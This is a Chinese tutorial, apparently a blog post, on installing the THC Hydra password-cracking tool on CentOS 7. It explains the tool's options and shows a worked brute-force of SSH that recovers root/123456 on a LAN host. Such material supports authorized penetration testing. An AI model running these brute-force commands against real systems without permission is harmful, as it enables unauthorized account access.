cenos7安装部署
下载
wget https://github.com/vanhauser-thc/thc-hydra/archive/master.zip
安装必要插件
yum -y install gcc libssh-devel openssl-devel
yum install -y unzip zip
yum install freerdp*
解压
unzip master.zip
进入目录
cd thc-hydra-master/
编译运行
./configure
make &&make install
安装成功
[root@localhost thc-hydra-master]# hydra -h
Hydra v9.5-dev (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
........省略
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
Hydra参数说明
- -l 指定单个用户名,适合在知道用户名爆破用户名密码时使用
- -L 指定多个用户名,参数值为存储用户名的文件的路径(建议为绝对路径)
- -p 指定单个密码,适合在知道密码爆破用户名时使用
- -P 指定多个密码,参数值为存贮密码的文件(通常称为字典)的路径(建议为绝对路径)
- -C 当用户名和密码存储到一个文件时使用此参数。注意,文件(字典)存储的格式必须为 “用户名:密码” 的格式。
- -M 指定多个攻击目标,此参数为存储攻击目标的文件的路径(建议为绝对路径)。注意:列表文件存储格式必须为 “地址:端口”
- -t 指定爆破时的任务数量(可以理解为线程数),默认为16
- -s 指定端口,适用于攻击目标端口非默认的情况。例如:http服务使用非80端口
- -S 指定爆破时使用 SSL 链接
- -R 继续从上一次爆破进度上继续爆破
- -v/-V 显示爆破的详细信息
- -f 一但爆破成功一个就停止爆破
- server 代表要攻击的目标(单个),多个目标时请使用 -M 参数
- service 攻击目标的服务类型(可以理解为爆破时使用的协议),例如 http,在hydra中,不同协议会使用不同的模块来爆破,hydra 的http-get 和 http-post 模块就用来爆破基于 get 和 post 请求的页面
- OPT 爆破模块的额外参数,可以使用 -U 参数来查看模块支持那些参数,例如命令:hydra -U http-get
Hydra示例
Hydra对ssh服务弱口令破解
[root@localhost thc-hydra-master]# hydra -l root -p 123456 192.168.1.251 ssh -v
Hydra v9.5-dev (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-22 11:41:00
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://192.168.1.251:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://root@192.168.1.251:22
[INFO] Successful, password authentication is supported by ssh://192.168.1.251:22
[ATTEMPT] target 192.168.1.251 - login "root" - pass "123456" - 1 of 1 [child 0] (0/0)
[22][ssh] host: 192.168.1.251 login: root password: 123456
[STATUS] attack finished for 192.168.1.251 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-22 11:41:21
Hydra不支持mysql5.5+的弱口令破解
网友评论